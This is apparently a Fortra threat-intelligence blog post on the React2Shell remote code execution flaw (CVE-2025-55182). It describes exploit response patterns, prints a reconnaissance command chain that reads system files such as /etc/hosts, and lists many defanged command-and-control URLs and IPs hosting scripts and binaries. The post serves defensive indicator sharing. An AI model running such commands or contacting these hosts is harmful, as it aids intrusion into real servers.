Fortra Intelligence and Research Experts (FIRE) declared CVE-2025-55182, a React server component remote code execution vulnerability dubbed React2Shell, as an emerging threat on December 3, 2025.
As usual, researchers evaluate existing content against known indicators of attack or compromise and create new detection content where needed. This was particularly challenging thanks to the high volume of proof-of-concept exploits (PoCs) publicly available, many of which were determined to be false after testing on vulnerable software versions. These false PoCs are also being used by attackers, creating a high volume of noisy and benign exploitation attempts for our threat hunters to sift through.
On December 5, Fortra threat hunters identified multiple instances of compromise linked to React servers. This supports an early report from the AWS Security Blog, and subsequent others, on rapid and mass exploitation of the bug. Hunts were escalated as incidents and contained while remediation actions are planned and implemented.
Due to the high volume of false PoCs creating challenges for high fidelity detection content, this blog will analyze two exploit strings that have triggered successful code execution and share a list of command and control IPs and URIs captured in exploit payloads to support others in identifying and investigating potential React2Shell compromises.
React2Shell Exploits & Vulnerable Responses
There are two main exploitation variants we have observed showing signs of successful exploitation. The first exploit string is a request of the form where the `res` is the variable to be returned in an `a` parameter in a header with the output of the command:
Vulnerable servers returned a 303 status response with the executed command being returned in the `x-action-redirect` header:
The second common exploit string is very similar, but has the `res` variable within the digest portion and removes a redirect step:
In this instance, vulnerable servers are responding with a 500 response code, with the output of the command appearing in the `E{"digest":"<res>"}` object:
The security content that captured exploit attempts was largely informed by open-source intelligence from Searchlight Cyber and adapted for Fortra security solutions.
The top 20 IP addressed observed triggering React2Shell IDS content since declaring the emerging threat are as follows:
Post-compromise Indicators
In the instances of compromise, threat actors used the exploit to trigger several types of commands on the victim hosts. The most common were basic commands to test code execution, such as multiplying two integers together `40302*41082`, where the result would be returned in the response, or a `whoami` command where the username would be returned. We also observed base64 encoded and plaintext commands and for more complex enumeration of multiple source, with a string of commands `uname -a ; id ;hostname -I ; ls -la / ; ls -la ~ ;cat /etc/hosts;cat /etc/resolv.conf` to extract a large volume of environment information and then illicit outbound Wget commands from the victim host, pulling single character files from a malicious dropper host.
FIRE have collected the IP and URIs of command-and-control locations that we have seen in React2Shell exploit attempts. We are sharing these (sanitized) artifacts and encouraging security teams to check for any outbound connections made to these malicious locations. This will support security teams in hunting for compromise stemming from React2Shell vulnerability as well as other methods of initial access.
Due to the high volume of exploitation attempts, detecting post compromise activity is advantageous in limiting noisy false positives.
React2Shell CnC URI’s observed:
149[.]248[.]44[.]88/ddd
15[.]161[.]175[.]172:443
154[.]89[.]152[.]240/check[.]sh
172[.]93[.]220[.]237:9999/domain[.]tld
43[.]156[.]137[.]45:8000/yyj
43[.]247[.]134[.]215:8998/nginx3
hxxp[:]//1[.]94[.]136[.]234:8084/slt
hxxp[:]//104[.]233[.]253[.]4:9090/update[.]sh
hxxp[:]//107[.]150[.]119[.]37:8085/slw
hxxp[:]//107[.]173[.]89[.]153:60051/slt
hxxp[:]//107[.]175[.]1[.]26:19092/slt
hxxp[:]//107[.]175[.]1[.]26:58087/slt
hxxp[:]//107[.]175[.]76[.]208:19999/linux_WDllqDGr1
hxxp[:]//107[.]175[.]76[.]208:4609/slt
hxxp[:]//107[.]175[.]76[.]208:9092/slt
hxxp[:]//108[.]61[.]217[.]22:80/upload
hxxp[:]//109[.]238[.]92[.]111/ch[.]sh
hxxp[:]//115[.]42[.]60[.]126:10089/slt
hxxp[:]//115[.]42[.]60[.]163:45523/slt
hxxp[:]//115[.]42[.]60[.]97:61160/slt
hxxp[:]//128[.]199[.]194[.]97:9001/setup2[.]sh
hxxp[:]//128[.]199[.]194[.]97:9002/setup2[.]sh
hxxp[:]//128[.]199[.]194[.]97:9003/setup2[.]sh
hxxp[:]//13[.]37[.]74[.]87
hxxp[:]//139[.]59[.]59[.]33:9001/setup2[.]sh
hxxp[:]//139[.]59[.]59[.]33:9002/setup2[.]sh
hxxp[:]//139[.]59[.]59[.]33:9003/setup2[.]sh
hxxp[:]//139[.]59[.]59[.]33:9004/setup2[.]sh
hxxp[:]//139[.]59[.]59[.]33:9005/setup2[.]sh
hxxp[:]//139[.]59[.]59[.]33:9006/setup2[.]sh
hxxp[:]//144[.]202[.]115[.]234:80/upload
hxxp[:]//149[.]248[.]44[.]88/ddd
hxxp[:]//149[.]28[.]224[.]90:80/upload
hxxp[:]//149[.]28[.]70[.]98:80/upload
hxxp[:]//154[.]94[.]239[.]69:7070/yjsc
hxxp[:]//158[.]94[.]209[.]210/bins/UnHAnaAW[.]x86
hxxp[:]//162[.]215[.]170[.]26:3000/sex[.]sh
hxxp[:]//162[.]215[.]170[.]26:8000/sex[.]sh
hxxp[:]//167[.]86[.]107[.]35:9999/muie[.]sh
hxxp[:]//172[.]236[.]52[.]146
hxxp[:]//172[.]237[.]55[.]180/c
hxxp[:]//172[.]245[.]79[.]16
hxxp[:]//176[.]117[.]107[.]1
hxxp[:]//176[.]117[.]107[.]154/bot
hxxp[:]//176[.]65[.]148[.]246/x
hxxp[:]//178[.]218[.]144[.]53:8000/funny[.]sh
hxxp[:]//18[.]170[.]164[.]174
hxxp[:]//18[.]211[.]232[.]182
hxxp[:]//18[.]235[.]135[.]157
hxxp[:]//185[.]14[.]92[.]152/nuts/bolts
hxxp[:]//185[.]14[.]92[.]152/nuts/x86
hxxp[:]//185[.]177[.]72[.]11:8001
hxxp[:]//185[.]177[.]72[.]8:8001
hxxp[:]//185[.]193[.]127[.]254/d/opi1G30i/exec[.]sh
hxxp[:]//185[.]196[.]10[.]247/kamd64
hxxp[:]//193[.]34[.]213[.]150/nuts/bolts
hxxp[:]//193[.]34[.]213[.]150/nuts/x86
hxxp[:]//194[.]246[.]84[.]13/slt
hxxp[:]//194[.]246[.]84[.]13:2033/linux_64[.]sh
hxxp[:]//194[.]246[.]84[.]13:2033/linux_64[.]sh/chain[.]sh
hxxp[:]//194[.]246[.]84[.]13:2045/slt
hxxp[:]//194[.]69[.]203[.]32:81/hiddenbink/react[.]sh
hxxp[:]//195[.]123[.]211[.]151:8080/d/opi1G30i/exec[.]sh
hxxp[:]//195[.]178[.]110[.]131:8001
hxxp[:]//196[.]251[.]100[.]191/update[.]sh
hxxp[:]//198[.]23[.]196[.]131:49953/slt
hxxp[:]//198[.]46[.]221[.]26:8989/crond
hxxp[:]//2[.]57[.]122[.]173:8001
hxxp[:]//204[.]76[.]203[.]40:1337/yankedLinux
hxxp[:]//207[.]148[.]79[.]178:6608/sys[.]sh
hxxp[:]//210[.]1[.]226[.]163:49934/server
hxxp[:]//213[.]21[.]239[.]39:8084/slt
hxxp[:]//213[.]21[.]239[.]39:8094/slt
hxxp[:]//216[.]158[.]232[.]43:12000/sex[.]sh
hxxp[:]//217[.]60[.]249[.]228:8000/stx[.]sh
hxxp[:]//23[.]132[.]164[.]54/bot
hxxp[:]//23[.]228[.]188[.]126/rondo[.]aqu[.]sh
hxxp[:]//23[.]235[.]188[.]3:653/get[.]sh
hxxp[:]//23[.]95[.]120[.]228:61111/slt
hxxp[:]//3[.]78[.]145[.]28
hxxp[:]//31[.]56[.]27[.]76/n2/x86
hxxp[:]//31[.]56[.]27[.]97/lula
hxxp[:]//31[.]56[.]27[.]97/scripts/4thepool_miner[.]sh
hxxp[:]//38[.]147[.]187[.]30/fecfXZX/1[.]sh
hxxp[:]//38[.]165[.]44[.]205/k
hxxp[:]//38[.]54[.]27[.]18/tmp[.]elf
hxxp[:]//39[.]97[.]229[.]220:8001/config1
hxxp[:]//41[.]231[.]37[.]153/rondo[.]aqu[.]sh
hxxp[:]//45[.]134[.]174[.]235:443/a1[.]sh
hxxp[:]//45[.]134[.]174[.]235:443/a2[.]sh
hxxp[:]//45[.]134[.]174[.]235:443/a3[.]sh
hxxp[:]//45[.]32[.]158[.]54/5e51aff54626ef7f/x86_64
hxxp[:]//45[.]76[.]155[.]14/vim
hxxp[:]//46[.]36[.]37[.]85:12000/sex[.]sh
hxxp[:]//47[.]243[.]29[.]225:8084/slt
hxxp[:]//47[.]84[.]113[.]198:8000/dev
hxxp[:]//47[.]84[.]98[.]53:18082/file/run
hxxp[:]//47[.]90[.]227[.]150/google_verify[.]php
hxxp[:]//5[.]199[.]174[.]1
hxxp[:]//5[.]199[.]174[.]151:80
hxxp[:]//5[.]199[.]174[.]151:8000/download/script[.]sh
hxxp[:]//51[.]145[.]122[.]82
hxxp[:]//51[.]91[.]77[.]94:13339/termite/51[.]91[.]77[.]94
hxxp[:]//54[.]78[.]196[.]249
hxxp[:]//64[.]176[.]63[.]130
hxxp[:]//64[.]49[.]251[.]61
hxxp[:]//66[.]154[.]106[.]246:9099/linux[.]sh
hxxp[:]//66[.]42[.]96[.]199:443/upload
hxxp[:]//67[.]215[.]229[.]176:9998/slt
hxxp[:]//82[.]196[.]224[.]106
hxxp[:]//84[.]247[.]176[.]139/system[.]js
hxxp[:]//89[.]144[.]31[.]18/nuts/bolts
hxxp[:]//89[.]144[.]31[.]18/nuts/boltsc
hxxp[:]//89[.]144[.]31[.]18/nuts/x86
hxxp[:]//91[.]108[.]243[.]251:9999/muie[.]sh
hxxp[:]//92[.]246[.]87[.]48:5000/download/sex[.]sh
hxxp[:]//93[.]123[.]109[.]173:8001
hxxp[:]//93[.]123[.]109[.]247:8000
hxxp[:]//93[.]123[.]109[.]247:8001
hxxp[:]//95[.]138[.]138[.]166
hxxps[:]//100[.]21[.]71[.]208
hxxps[:]//13[.]235[.]158[.]164:9443/authenticationendpoint/watchdog_config
hxxps[:]//15[.]156[.]132[.]101
hxxps[:]//18[.]224[.]216[.]230
hxxps[:]//3[.]33[.]251[.]24
hxxps[:]//34[.]196[.]149[.]252
hxxps[:]//52[.]43[.]180[.]78
hxxps[:]//52[.]43[.]68[.]93
React2Shell CnC IPs observed:
1[.]94[.]136[.]234
100[.]21[.]71[.]208
104[.]233[.]253[.]4
107[.]150[.]119[.]37
107[.]173[.]89[.]153
107[.]175[.]1[.]26
107[.]175[.]76[.]208
108[.]61[.]217[.]22
109[.]238[.]92[.]111
115[.]42[.]60[.]126
115[.]42[.]60[.]163
115[.]42[.]60[.]97
128[.]199[.]194[.]97
13[.]235[.]158[.]164
13[.]37[.]74[.]87
139[.]59[.]59[.]33
144[.]202[.]115[.]234
149[.]248[.]44[.]88
149[.]28[.]224[.]90
149[.]28[.]70[.]98
15[.]156[.]132[.]101
15[.]161[.]175[.]172
15[.]164[.]26[.]211
154[.]89[.]152[.]240
154[.]94[.]239[.]69
158[.]94[.]209[.]210
162[.]13[.]106[.]151
162[.]13[.]244[.]72
162[.]215[.]170[.]26
167[.]86[.]107[.]35
172[.]236[.]52[.]146
172[.]237[.]55[.]180
172[.]245[.]79[.]16
172[.]93[.]220[.]237
176[.]117[.]107[.]1
176[.]117[.]107[.]154
176[.]65[.]148[.]246
178[.]218[.]144[.]53
18[.]170[.]164[.]174
18[.]189[.]42[.]179
18[.]211[.]232[.]182
18[.]224[.]216[.]230
18[.]224[.]99[.]66
18[.]235[.]135[.]157
185[.]14[.]92[.]152
185[.]177[.]72[.]11
185[.]177[.]72[.]8
185[.]193[.]127[.]254
185[.]196[.]10[.]247
193[.]34[.]213[.]150
194[.]246[.]84[.]13
194[.]69[.]203[.]32
195[.]123[.]211[.]151
195[.]178[.]110[.]131
196[.]251[.]100[.]191
198[.]23[.]196[.]131
198[.]46[.]221[.]26
2[.]57[.]122[.]173
20[.]127[.]243[.]9
204[.]76[.]203[.]40
207[.]148[.]79[.]178
210[.]1[.]226[.]163
213[.]21[.]239[.]39
216[.]158[.]232[.]43
217[.]60[.]249[.]228
23[.]132[.]164[.]54
23[.]228[.]188[.]126
23[.]235[.]188[.]3
23[.]95[.]120[.]228
3[.]138[.]152[.]124
3[.]223[.]120[.]16
3[.]229[.]150[.]13
3[.]33[.]251[.]24
3[.]78[.]145[.]28
3[.]83[.]76[.]64
31[.]56[.]27[.]76
31[.]56[.]27[.]97
34[.]196[.]149[.]252
34[.]218[.]176[.]239
35[.]152[.]38[.]1
38[.]147[.]187[.]30
38[.]165[.]44[.]205
38[.]54[.]27[.]18
39[.]97[.]229[.]220
41[.]231[.]37[.]153
43[.]156[.]137[.]45
43[.]247[.]134[.]215
44[.]199[.]9[.]236
44[.]213[.]4[.]180
45[.]134[.]174[.]235
45[.]32[.]158[.]54
45[.]76[.]155[.]14
46[.]36[.]37[.]85
47[.]243[.]29[.]225
47[.]84[.]113[.]198
47[.]84[.]98[.]53
47[.]90[.]227[.]150
5[.]199[.]174[.]1
5[.]199[.]174[.]151
51[.]145[.]122[.]82
51[.]91[.]77[.]94
52[.]43[.]180[.]78
52[.]43[.]68[.]93
52[.]45[.]22[.]121
52[.]7[.]247[.]134
54[.]193[.]125[.]94
54[.]78[.]196[.]249
64[.]176[.]63[.]130
64[.]49[.]251[.]61
66[.]150[.]187[.]132
66[.]154[.]106[.]246
66[.]42[.]96[.]199
67[.]215[.]229[.]176
82[.]196[.]224[.]106
84[.]247[.]176[.]139
89[.]144[.]31[.]18
91[.]108[.]243[.]251
92[.]246[.]87[.]48
93[.]123[.]109[.]173
93[.]123[.]109[.]247
95[.]138[.]138[.]166
98[.]90[.]179[.]188
23[.]226[.]71[.]197
23[.]226[.]71[.]200
23[.]226[.]71[.]209
The Fortra SOC continues to work with impacted organizations during their incident response processes and have also identified and escalated instances of suspected vulnerability where certain 500 responses were being seen from React servers.
FIRE will continue to monitor React2Shell active campaigns (CVE-2025-55182) and will disclose further information that may support the threat intelligence community when it is responsible to do so. For more information on the React2Shell emerging threat, you can view React Server Component Remote Code Execution Vulnerability.
Cybercrime Intelligence Shouldn't Be Siloed
Fortra® experts are dedicated to protecting organizations and the public by delivering the latest insights, data, and defenses to strengthen security against emerging cyber threats.
